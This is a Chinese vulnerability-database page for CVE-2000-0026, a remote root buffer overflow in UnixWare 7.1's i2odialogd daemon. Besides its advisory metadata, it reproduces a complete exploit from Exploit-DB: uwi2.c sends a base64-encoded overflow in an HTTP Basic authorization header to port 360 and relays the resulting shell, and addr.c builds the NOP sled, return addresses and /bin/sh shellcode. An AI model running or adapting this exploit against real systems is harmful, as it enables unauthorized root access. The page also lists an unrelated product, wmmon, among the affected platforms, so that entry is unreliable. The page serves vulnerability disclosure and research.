CVE-2000-0026
CVSS10.0
发布时间 :1999-12-21 00:00:00
修订时间 :2016-10-17 22:06:12
NMCOE    

[原文]Buffer overflow in UnixWare i2odialogd daemon allows remote attackers to gain root access via a long username/password authorization string.


[CNNVD]上海合作组织UnixWare i2odialogd远程缓冲区溢出漏洞(CNNVD-199912-067)

        UnixWare i2odialogd守护进程中存在缓冲区溢出漏洞,远程攻击者利用该漏洞通过一个长用户名/密码认证字符串获得根访问
        。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:windowmaker:wmmon:1.0b2
cpe:/o:sco:unixware:7.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0026
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0026
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199912-067
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=94606167110764&w=2
(UNKNOWN)  BUGTRAQ  19991223 FYI, SCO Security patches available.
http://www.securityfocus.com/bid/876
(UNKNOWN)  BID  876

- 漏洞信息

上海合作组织UnixWare i2odialogd远程缓冲区溢出漏洞
危急 缓冲区溢出
1999-12-21 00:00:00 2005-05-02 00:00:00
远程  
        UnixWare i2odialogd守护进程中存在缓冲区溢出漏洞,远程攻击者利用该漏洞通过一个长用户名/密码认证字符串获得根访问
        。

- 公告与补丁

        Fix available:
        SCO Unixware 7.1
        

- 漏洞信息 (19680)

SCO Unixware 7.1 i2odialogd Remote Buffer Overflow Vulnerability (EDBID:19680)
sco remote
1999-12-22 Verified
0 Brock Tellier
N/A [点击下载]
source: http://www.securityfocus.com/bid/876/info


UnixWare is a variant of the Unix operating system originally written by SCO, and distributed and maintained by Caldera.

i20dialogd is a daemon which provides a front-end for controlling the i20 subsystem. It is shipped with SCO Unixware and installed running as root by default. In its authentication mechanism exists a serious buffer overflow vulnerability. The username/password buffers are of a fixed length (88+ characters) with no bounds checking performed on them. Because of this it is possible to overflow the buffer, corrupt the stack and overwrite the return address altering the flow of execution (and running arbitrary code). It should be noted that exploit code must be encoded (base64) before being sent to the server. 

/* uwi2.c
 *
 * i2o remote root exploit for UnixWare 7.1
 * compile on UnixWare with cc -o uwi2 uwi2.c -lsocket -lnsl
 * ./uwi2 <hostname> =

 * The hard-coded RET address is 0x8047d4c =

 *
 * To either replace the shellcode or change the offset you must =

 * first craft a program which outputs, in this order:
 * - 92 bytes of your RET address (EIP starts at 89)
 * - NOPs, as many as you would like
 * - your shellcode
 * - the character ":"
 * - any character, maybe "A", as I've done below
 * - NULL
 * When printf()'ing this string, do NOT append a \newline!
 * You then pipe the output of this program to a MIME encoder (mimencode =

 * on UnixWare).  You then take the output of this program and paste it
 * where I've marked below.
 *
 * Brock Tellier btellier@usa.net
 *
*/

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/errno.h>
#include <netdb.h>

#define BUFLEN 10000

/* since we're overflowing an Authenticate: Basic username */
/* our exploit code must be base64(MIME) encoded */

char *mimecode =


/**** CHANGE THIS PART OF THE EXPLOIT STRING ****/
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQTH0ECEx9BAhMfQQITH0ECEx9BAhMfQQITH0ECEx9BAhMfQQITH0ECJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ6xteMduJXgeJXgyIXhExwLA7jX4HiflT=
"
"UVZW6xDo4P///y9iaW4vc2iqqqqqmqqqqqoHqpCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQ=
"
"kJCQkJCQkJCQkJCQkJCQkJCQkDpB";
/************************************************/

char *auth=
"GET / HTTP/1.0\r\n"
"Host: localhost:360\r\n"
"Accept: text/html\r\n"
"Accept-Encoding: gzip, compress\r\n"
"Accept-Language: en\r\n"
"Negotiate: trans\r\n"
"User-Agent: xnec\r\n"
"Authorization: Basic";

char buf[BUFLEN];
char sockbuf[BUFLEN];
char c;
int offset=0;
int i, ascii,num;
int i2oport = 360;
int sock;
int addr = 0x80474b4;
struct  sockaddr_in sock_a;
struct  hostent *host;

void main (int argc, char *argv[]) {
        =

 if(argc < 2) {
   fprintf(stderr, "Error:Usage: %s <hostname> \n", argv[0]);
   exit(0);
  }
 if(argc == 3) offset=atoi(argv[2]);
 =

 sprintf(buf, "%s %s \r\n\r\n", auth, mimecode);
 buf[BUFLEN - 1] = 0;

 fprintf(stderr, "i2odialogd remote exploit for UnixWare 7.1\n");
 fprintf(stderr, "Brock Tellier btellier@usa.net\n");

 if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {
    perror("gethostbyname"); =

    exit(-1);
  }
 =

 if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
    perror("create socket");
    exit(-1);
  }

 sock_a.sin_family=AF_INET;
 sock_a.sin_port=htons(i2oport);
 memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);
 if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {
    perror("create connect");
    exit(-1);
  }

  fflush(stdout);

  // write exploit
  write(sock,buf,strlen(buf));

  //begin read
  while(1) {
    fd_set input;
    FD_SET(0,&input);
    FD_SET(sock,&input);
    select(sock+1,&input,NULL,NULL,NULL);

    if(FD_ISSET(sock,&input)) {
      num=read(sock,sockbuf,BUFLEN);
      write(1,sockbuf,num);
     }
     if(FD_ISSET(0,&input))
     write(sock,sockbuf,read(0,sockbuf,BUFLEN));
  }
}

------

--- addr.c ---

/* =

 * addr.c - Add-on for the UnixWare 7.1 remote root exploit in i2dialogd
 * simply MIME encode the output of this program and put into the =

 * appropriate place in uwi2.c
 * =

 * Usage: cc -o addr addr.c; ./addr <offset> <size>
 *
 * Brock Tellier btellier@usa.net
*/

#include <stdio.h>
#define NOP 0x90

char scoshell[]= =

"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

void main(int argc, char *argv[]) {

long addr;
char buf[2000];
int i;
int offset;
int size = 400;

if (argc > 1) offset = atoi(argv[1]);
if (argc > 2) size = atoi(argv[2]);

addr=0x8046000 + offset;
memset(buf, NOP, size);
for(i=60;i<100;i+=4)*(int *)&buf[i]=addr;
for(i = 0; i < strlen(scoshell); i++)
   buf[i+300] = scoshell[i];
buf[size - 3] = ':'; =

buf[size - 2] = 'A';
buf[size - 1] = 0;
fprintf(stderr, "using addr 0x%x with offset %d \n", addr, offset);
fprintf(stderr, "mime-encode the stdoutput!\n");
printf(buf);

}

		

- 漏洞信息

6310
SCO UnixWare i2odialogd Daemon Username Authorization String Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

The i2odialog daemon in UnixWare contains a flaw that may allow a remote attacker to gain access to unauthorized privileges. The issue is triggered due to improper bounds checking of the i2odialog daemon, resulting in an buffer overflow. When sending a long username/password authorization string with 88 or more characters, a remote attacker could gain root access, resulting in a loss of integrity.

- 时间线

1999-12-22 Unknow
1999-12-22 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, SCO has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站